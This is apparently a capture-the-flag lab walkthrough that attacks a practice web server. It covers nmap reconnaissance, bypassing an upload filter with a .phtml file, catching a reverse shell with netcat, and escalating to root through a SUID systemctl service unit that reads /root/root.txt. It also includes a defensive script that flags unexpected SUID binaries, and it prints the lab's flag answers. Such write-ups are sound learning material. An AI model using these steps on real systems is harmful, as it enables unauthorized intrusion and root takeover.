Task2
Reconnaissance
Scan the box; how many ports are open?
┌──(notthei㉿kali)-[~]
└─$ nmap -sV 10.10.14.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-17 09:22 JST
Nmap scan report for 10.10.14.51
Host is up (0.34s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
3128/tcp open http-proxy Squid http proxy 4.10
3333/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 129.73 seconds
6
What version of the squid proxy is running on the machine?
4.10
How many ports will Nmap scan if the flag -p-400 was used?
400
What is the most likely operating system this machine is running?
Ubuntu
What port is the web server running on?
3333
What is the flag for enabling verbose mode using Nmap?
-V
Task3
Locating directories using Gobuster
What is the directory that has an upload form page?
internal
Task4
Compromise the Webserver
What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out.
.php
What extension is allowed after running the above exercise?
I just happened to get it to work while uploading random files.
.phtml
What is the name of the user who manages the webserver?
Use this to get a reverse shell.
The uploaded file is under /internal/uploads/.
┌──(notthei㉿kali)-[~]
└─$ nc -lvnp 9999
$
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ip-10-10-14-51:/$ cat /etc/passwd
www-data@ip-10-10-14-51:/home$ ls
bill ubuntu
bill
What is the user flag?
/home/bill/user.txt
8bd7992fbe8a6ad22a63361004cfcedb
Task5
Privilege Escalation
On the system, search for all SUID files. Which file stands out?
www-data@ip-10-10-14-51:/home/bill$ find / -perm -u+s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/gpasswd
/bin/su
/bin/mount
/bin/umount
/bin/systemctl
/bin/fusermount
systemctl looks suspicious.
bin/systemctl
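From the defender's side, the same SUID listing can be checked against a baseline so that an entry like systemctl is reported automatically. This is an added example, not part of the original writeup; the BASELINE list and the function names are assumptions to adapt to your own image.

```shell
#!/bin/sh
# Added example: flag SUID binaries that are not in an expected baseline.
# BASELINE is an assumption: programs that normally ship setuid-root on a
# stock Ubuntu install, written with merged-/usr paths. Adjust per image.
BASELINE="/usr/bin/chfn /usr/bin/chsh /usr/bin/fusermount /usr/bin/gpasswd \
/usr/bin/mount /usr/bin/newgidmap /usr/bin/newgrp /usr/bin/newuidmap \
/usr/bin/passwd /usr/bin/pkexec /usr/bin/su /usr/bin/sudo /usr/bin/umount"

# Reads one path per line on stdin and prints every path that is not in
# BASELINE. Full paths are compared, so a setuid copy of a baseline
# program in an unusual directory (e.g. /tmp/su) is still reported.
unexpected_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        # /bin and /sbin are /usr/bin and /usr/sbin on merged-/usr systems
        case "$path" in
            /bin/*|/sbin/*) norm="/usr$path" ;;
            *) norm="$path" ;;
        esac
        case " $BASELINE " in
            *" $norm "*) ;;                 # expected, stay quiet
            *) printf '%s\n' "$path" ;;     # not in baseline: review it
        esac
    done
}

# Live collection, using the same find command as the writeup.
# On a real host: scan_suid | unexpected_suid
scan_suid() {
    find / -perm -u+s -type f 2>/dev/null
}

# The find output shown in the writeup, embedded so this runs offline.
page_listing() {
    printf '%s\n' /usr/bin/newuidmap /usr/bin/chfn /usr/bin/newgidmap \
        /usr/bin/sudo /usr/bin/chsh /usr/bin/passwd /usr/bin/pkexec \
        /usr/bin/newgrp /usr/bin/gpasswd /bin/su /bin/mount /bin/umount \
        /bin/systemctl /bin/fusermount
}

# Prints only /bin/systemctl for the listing from the writeup.
page_listing | unexpected_suid
```

Removing the bit with `chmod u-s /bin/systemctl` brings the host back to the baseline.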
What is the root flag value?
systemctl has the SUID bit set, so privilege escalation is possible.
www-data@ip-10-10-14-51:/home/bill$ TF=$(mktemp).service
> echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/root"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@ip-10-10-14-51:/home/bill$ systemctl link $TF
www-data@ip-10-10-14-51:/home/bill$ systemctl enable --now $TF
www-data@ip-10-10-14-51:/home/bill$ cat /tmp/root
a58ff8579f0a9270368d33a9966c7fd5